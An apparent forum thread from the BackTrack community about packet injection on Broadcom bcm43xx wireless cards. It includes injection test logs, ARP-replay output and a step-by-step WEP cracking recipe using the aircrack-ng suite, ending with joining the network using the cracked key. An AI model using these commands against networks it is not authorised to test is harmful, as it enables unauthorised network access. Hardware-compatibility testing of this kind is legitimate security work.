Testing still in progress, but Aireplay attack 9 (injection test) says it's working...
bt ~ # iwconfig eth0
eth0 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318"
Mode:Monitor Frequency=2.437 GHz Access Point: Invalid
Bit Rate=1 Mb/s Tx-Power=18 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

bt ~ # ifconfig eth0 up
bt ~ # iwconfig eth0 mode Monitor channel 6
bt ~ # aireplay-ng -9 -e WOPR -a 00:14:BF:1C:CF:E3 eth0
11:59:46 Trying broadcast probe requests...
11:59:47 No Answer...
11:59:47 Found 1 AP

11:59:47 Trying directed probe requests...
11:59:47 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
11:59:53 Ping (min/avg/max): 1.608ms/29.276ms/137.090ms
11:59:53 9/30: 30%

11:59:53 Injection is working!

UPDATE

Injection works with bcm43xx!

Aireplay-ng attacks 1 and 3...

I injected for ~60 seconds and captured ~5400 IVs with airodump.
bt ~ # aireplay-ng -1 0 -e WOPR -a $AP -h $WIFI eth0
12:24:20 Waiting for beacon frame (BSSID: 00:14:BF:1C:CF:E3)
12:24:20 Sending Authentication Request
12:24:20 Authentication successful
12:24:20 Sending Association Request
12:24:22 Association successful :-)
bt ~ # aireplay-ng -3 -b $AP -h $WIFI eth0
Saving ARP requests in replay_arp-0617-122426.cap
You should also start airodump-ng to capture replies.
12:24:32 Packets per second adjusted to 375nt 1380 packets...(240 pps)
12:24:36 Packets per second adjusted to 282ent 2033 packets...(265 pps)
12:24:43 Packets per second adjusted to 212ent 3225 packets...(262 pps)
12:24:55 Packets per second adjusted to 159ent 5245 packets...(237 pps)
12:25:04 Packets per second adjusted to 120ent 6220 packets...(216 pps)
12:25:10 Packets per second adjusted to 90sent 6599 packets...(205 pps)
12:25:12 Packets per second adjusted to 68sent 6644 packets...(203 pps)
Read 10231 packets (got 3907 ARP requests), sent 7456 packets...(164 pps)

The final step was using the ptw attack:

~40,000 packets injected in <5 minutes.

bt ~ # aircrack-ptw wopr-03.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:14:BF:1C:CF:E3 keyindex=0
stats for bssid 00:14:BF:1C:CF:E3 keyindex=0 packets=39453
Found key with len 13: <<hidden>>

The Wiki has been edited to reflect that the bcm43xx patch does in fact support injection.

test it like this.....
aireplay-ng --test -i rausb0 eth0

rausb0 is another card in monitor mode in the same channel as eth0, it will act as an ap
eth0 is the card you want to test

will output the testings of each attack like this
attack -1 OK
attack -2 OK
attack......

it's card to card injection really useful but need 2 cards in monitor mode on the same channel

hope helps to accurate the results of testings

Card to card injection not working...but as far as I am concerned, from the results above, bcm43xx does in fact support injection.
bt ~ # aireplay-ng --test -i ath1 eth0
13:55:47 Trying broadcast probe requests...
13:55:48 Injection is working!
13:55:48 Found 1 AP

13:55:48 Trying directed probe requests...
13:55:48 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
13:55:56 Ping (min/avg/max): 1.584ms/1.601ms/1.629ms
13:55:56 3/30: 10%


13:55:56 Trying card-to-card injection...
13:55:58 Attack -0: Failed
13:56:00 Attack -1 (open): Failed
13:56:02 Attack -1 (psk): Failed
13:56:04 Attack -2/-3/-4: Failed
13:56:07 Attack -5: Failed

according to this yes but strange that the attacks failed...the cards are on same channel ? it's necessary to initiate card to card injection...

but according to what i see in ur results...it works

according to this yes but strange that the attacks failed...the cards are on same channel ? it's necessary to initiate card to card injection...

but according to what i see in ur results...it works
I'll check again when I get home...can't work too hard on Father's Day!!!

I re-initialized both cards monitor mode ensuring they were both on the same channel...with the exception of attack 5, the test shows that the bcm43xx driver is not only patched for injection, but works. A manual test of attack 5 also failed.
bt ~ # aireplay-ng --test -i eth0 ath2
18:14:19 Trying broadcast probe requests...
18:14:19 Injection is working!
18:14:20 Found 1 AP

18:14:20 Trying directed probe requests...
18:14:20 00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
18:14:23 Ping (min/avg/max): 1.606ms/37.455ms/141.992ms
18:14:23 22/30: 73%


18:14:23 Trying card-to-card injection...
18:14:23 Attack -0: OK
18:14:23 Attack -1 (open): OK
18:14:23 Attack -1 (psk): OK
18:14:23 Attack -2/-3/-4: OK
18:14:25 Attack -5: Failed

SSID is WOPR? That's funny!

SSID is WOPR? That's funny!
Yeah, I've had it that way for years. Amazingly enough, it's fairly unique.

"I re-initialized both cards monitor mode ensuring they were both on the same channel..."

i was sure it was why card to card injection failed the first time....
if basic injection test is ok....at least -1 attack must say ok in card to card injection...........

this is awesome. are these patches going to be put into the patched BT2 coming out soon?

this is awesome. are these patches going to be put into the patched BT2 coming out soon?
The bcm43xx drivers are already patched in BT2 final; no need to do anything further.

theprez98,

Have you tried it with the -4 attack. I can't seem to get it to work, but when using the same parameters on a different interface (linksys WUSB54G card), it works fine.

theprez98,

Have you tried it with the -4 attack. I can't seem to get it to work, but when using the same parameters on a different interface (linksys WUSB54G card), it works fine.
When I did the card-to-card injection test, all attacks worked. I haven't tried it beyond that.

Motorola WN825G v2 (http://backtrack.offensive-security.com/index.php?title=HCL:Wireless#Motorola_WN825G_v2) (Broadcom 4306 chipset, bcm43xx driver) added to Wiki.

is your card a 4318 ?
if yes no way to inject with it....im preparing a wiki article for this....
as far as i know, only 4306 and 4311 will work

is your card a 4318 ?
if yes no way to inject with it....im preparing a wiki article for this....
as far as i know, only 4306 and 4311 will work
See above, the Motorola is a 4306. My internal PCI (the original subject of this thread) is a 4318 and it does in fact inject.

the one ive tested can do only -0 -1 attacks....i need to do some further tests maybe....so it works......strange mine 4318 not.......

This page (http://bcm43xx.berlios.de/?go=devices) describes which Broadcom chip IDs are likely to work and which aren't.

My integrated wireless is a 4318 (listed as "unstable") and injected properly.

I have a Motorola WN825G with a 4306 (listed as "supported") but haven't gotten quite the same results with it...yet.

4311 PCI-E Supported for kernel 2.6.20.6 and later
i got one of these...
but it's quite unstable i can't set the rate...stay at 1 MO....can't inject too

do u know what where i can see the subversion of kernel we have in bt2 ?

i know it's 2.6.20.X but 2.6.20.6 is needed

thx

as far as i know, only 4306 and 4311 will work

mine is a Dell Wireless 1390 WLAN Mini-PCI Card (rev 02) n i cant even connect 2 my wifi router using wifi assitance...any suggesttion why its nt working ?

sometimes this works for me
just copy and paste in console

ifconfig eth1 down && rmmod bcm43xx && modprobe bcm43xx && macchanger -m 00:11:22:33:44:55 eth1 && ifconfig eth1 up && iwconfig eth1 rate 1M

it didn't worked for me and BTW my interface name is eth0 not eth1

eth0 ? sure ? usually this is a wired card ... :confused:

eth0 ? sure ? usually this is a wired card ... :confused:

yaa sure my ethernet interface is eth1 and wireless eth0 also mdk3 working in beacon and probe mode but not in other and aircrack-ng suite doesnt.But today i tried aireplay-ng -9 -e linksys -a [router mac] eth0 on following was my out put:-1
1:59:46 Trying broadcast probe requests...
11:59:47 No Answer...
11:59:47 Found 1 AP

11:59:47 Trying directed probe requests...
11:59:47 [router mac] - channel: 6 - 'linksys'
11:59:53 0/30: 0%
i fail to understand:-
1)i cant connect to my router to surf net?
2) if my card doesnot support injection then how can it inject beacons in mdk3 , probe mode. (if have checked it using netstumbler using another laptop).?
3)if it cannot scan networks in airmon-ng on channel 6 then how come it finds an AP when above injection test is run?

I too am having problems getting injection to work on my DELL 1390,
I keep getting the error "Driver may not be patched for injection"

I read that BT2Final has patched drivers , so does it means my laptop is shite [well it is a dell i suppose] or is there something else i can try?

Hp/Compaq Presario C500 (c550em)
06:00.0 Network controller: Broadcom Corporation Dell Wireless 1390 WLAN Mini-PCI Card (rev 01)

I can confirm that this supports injection, i upgraded to the latest svn version.

Sending the fake ARPs did produce a bof.
I can't remember the output it produced, but i'll check their site to see if it is a known issue.

My laptop's integrated bcm4318 worked like a charm. If you can handle it at 10 PPS. It took a little over an hour to get enough ARPs to crack the WEP. I wish it was faster.

*tested on BT3*

My broadcom 4318 (in a HP Pavilion ze2000) cracked a 40bits WEP key about 10 minutes.

the proof: img137.imageshack.us/img137/5416/broadcomym8.gif

the tip:
if you got a "wi_write(): Illegal seek" error in aireplay command, just append at the end "-x 30" :)

Can report that the BCM 4306 in a Dell 1350 injects and works fine....

At first, using default settings, I'd get a stop with the error message saying it couldn't do a "write"...

Advised to use the -x 30; I opted for -x 250 and it ran perfect... tried again at -x 300, -x 350, -x 400... which was the highest that ran successfully.

However, it varies with the AP being pinged... once, an -x 10 was required....

So, get a write_error, just adjust your -x ??? setting

Nice thing is that you don't lose the captured packets you already have... it just creates another file with the name incremented by 1....

Glad folks are mentioning the use of the "-x ???" function to workaround the "write_error"; sure helped me!

teach

This may be the wrong place for this and I am sorry if that is the case but I was wondering if the BCM4318 chipset was capable of injection for Windows programs. If anyone have any ideas or can point me in the right direction I would appreciate it. Thanks.

This may be the wrong place for this and I am sorry if that is the case but I was wondering if the BCM4318 chipset was capable of injection for Windows programs. If anyone have any ideas or can point me in the right direction I would appreciate it. Thanks.

dont want to sound cold hearted, but this is indeed the wrong place to ask. as this is a linux forum.
you might want to try at aircracks forum

That wasn't cold at all. Thank you very much.

I have a D410 with a Broadcom that I messed around with for a few hours tonight. It works until it tries to inject and then gives the "wi_write(): Illegal seek" error that a lot of people see. I played with a linksys USB that wouldn't do any injection and then had an old Cisco Aironet 350 that wouldn't go into Monitor mode.

What a PIA... I ordered an Aetheros minipci card off ebay for $25 bucks tonight. See if I can get this working!

i have also got injection to work with a broadcom 4318 on a compaq v2000 using -x 100. very slow but effective, i was able to crack my wep in about 5 mins. the range is also very limited as others have reported. i tried to crack my neighbors wep (with permission of course) but was too far away to inject, i had to get within 100ft of his router. i have also had problems surfing the net with this card. i can log onto my network and go onto the internet but the connection is very unstable, it will work great one minute, then stop working. i'm gonna check out some new cards soon.

im kinda new to linux, a little help would be apreciated

i have a hp pavillion dv6000 with a bcm4311, i can bring the card up but i cant connect to my ap using the wifi manager or the cli, even when i disable authentication heres what i typed


bt ~ # ifconfig
eth0 Link encap:Ethernet HWaddr 00:00:6C:0D:27:E3
inet addr:192.168.0.19 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22838 errors:0 dropped:0 overruns:0 frame:0
TX packets:15053 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:27555547 (26.2 MiB) TX bytes:2215315 (2.1 MiB)
Interrupt:19 Base address:0xe000

eth1 Link encap:UNSPEC HWaddr 00-00-00-1A-73-63-00-00-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:338 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:15236 (14.8 KiB)
Interrupt:10

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:21 errors:0 dropped:0 overruns:0 frame:0
TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4048 (3.9 KiB) TX bytes:4048 (3.9 KiB)

bt ~ # iwconfig eth1 essid SKY50023
bt ~ # iwconfig eth1 channel 11
bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

eth1 IEEE 802.11b/g ESSID:"SKY50023" Nickname:"Broadcom 4311"
Mode:Monitor Frequency=2.462 GHz Access Point: Invalid
Bit Rate=1 Mb/s Tx-Power=18 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
as you can c it is looking for my ap but it cant find it, i have no encryption im just trying to get it to connect

thanks for the help in advance

You know the Broadcom isn't well supported in BT?

Check the wiki > Wireless Card Compatibility (http://backtrack.offensive-security.com/index.php/HCL:Wireless)

I have a D410 with a Broadcom that I messed around with for a few hours tonight. It works until it tries to inject and then gives the "wi_write(): Illegal seek" error that a lot of people see. I played with a linksys USB that wouldn't do any injection and then had an old Cisco Aironet 350 that wouldn't go into Monitor mode.

What a PIA... I ordered an Aetheros minipci card off ebay for $25 bucks tonight. See if I can get this working!

Just to recap here, I received the Aetheros minipci card today and it works perfectly. For anyone trying to get all this stuff to work just order a card off ebay. They are cheap!

It injects at 500pps too. :cool:

Just to recap here, I received the Aetheros minipci card today and it works perfectly. For anyone trying to get all this stuff to work just order a card off ebay. They are cheap!

It injects at 500pps too. :cool:
ive already orderd a new card but it isnt here yet, i just wanted to know what im doing wrong, i know the broadcom cards are a pain in the arse because of there closed cource drivers but i dont understand y i cant even connect to my own ap just to browse the net. i have to hookup the ethernet cable. if any one can tell me id apreciate it

Hi everyone (and sorry for my english)
I have a broadcom wireless card (chipset 4311) on my HP laptop.
I'm using BT3beta.
After booting, I launch a shell then enter
ifconfig -> there's only one interface: lo
then
iwconfig -> there are two interface lo again and eth0 which corresponds to my bcm4311 card (configured in managed mode)
if i try to use airodump-ng (airodump-ng eth0) it says that the interface does not exist (understandable)
then
iwconfig eth0 mode monitor -> OK (when i send iwconfig again it shows that my card is now in monitor mode)
then
airodump-ng eth0 -> there's no messages of error, the usual appearance of airodump-ng appears but no station/network is found although i can find more than 30 APs when i'm on Windows and i'm just near my own AP (less than 2meters !)
So what am i supposed to do ? I'm not talking about injection just about monitoring for now !!! And i read lots of topics about bcm4311 none of them answered my problem! So please help!
Thanks

Uncle'

UP!
No one can help me to explain what happens ?
thx

I have Dell Inspiron 1525 with Broadcom 4311 wireless chipset & I was able to crack 64 & 128 WEP key in just 5 minutes.

Injection is working fine. I use BT3b USB bootable (900+MB file size). You must have good signal on the AP. It will not work if you are too far on the AP.

Here is the step by step I do on cracking WEP key.

### Start the wireless interface in monitor mode

airmon-ng stop eth0
airmon-ng start eth0

OR

iwfconfig eth0 mode monitor

### Start airodump-ng to capture the IVs

airodump-ng -c [AP CHANNEL] --bssid [AP MAC] -w [OUTPUT FILENAME] eth0

### To associate with an access point, use fake authentication:

aireplay-ng -1 0 -e [AP SSID] -a [AP MAC] -h [YOUR WLAN MAC] eth0

### Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -x 300 -b [AP MAC] -h [YOUR WLAN MAC] eth0

### Run aircrack-ng to obtain the WEP key

aircrack-ng -z -b [AP MAC] [OUTPUT FILENAME].cap

### Use the WEP key to connect

iwconfig
iwconfig eth0 mode manage
iwconfig
ifconfig eth0 down
iwconfig eth0 essid [NETWORKNAME] key [HACKED WEP]
ifconfig eth0 up
dhcpcd eth0
ping yahoo.com



if you got a "wi_write(): Illegal seek" error in "aireplay-ng -3 -x 300 -b [AP MAC] -h [YOUR WLAN MAC] eth0" command, just lower down the "-x" value

thanx for the answer but the problem is i can't see any AP when i use airodump-ng !
So what am i supposed to do ?

uncle'

Hi there i have question.
Did that Wi card support for that topic??
BCM4306/BCM2050

I have a BCM4328 (HP DV6646us) and iwconfig says 'no wireless extensions'. should i do something else to configure it??

is this injection avaliable by just running the live CD without messing with drivers for injection?

I would like to know if i can have a 'stock' live cd with my BCM 4306 on my Compaq Presario r3000 series laptop with the BCM 4306. Or do i need to use the fwcutter like i had to in BT2?

Help me. In BackTrack 3 final does not work aireplay-ng c as my card bcm4312.
It is necessary about the beginning assotiating with AP, and then to do an injection?
P.S
Excuse for my English, because I from Russia!

It is necessary about the beginning assotiating with AP, and then to do an injection?

Yes you will have to be successfully associated with the AP in order for it to accept the packets you inject to it.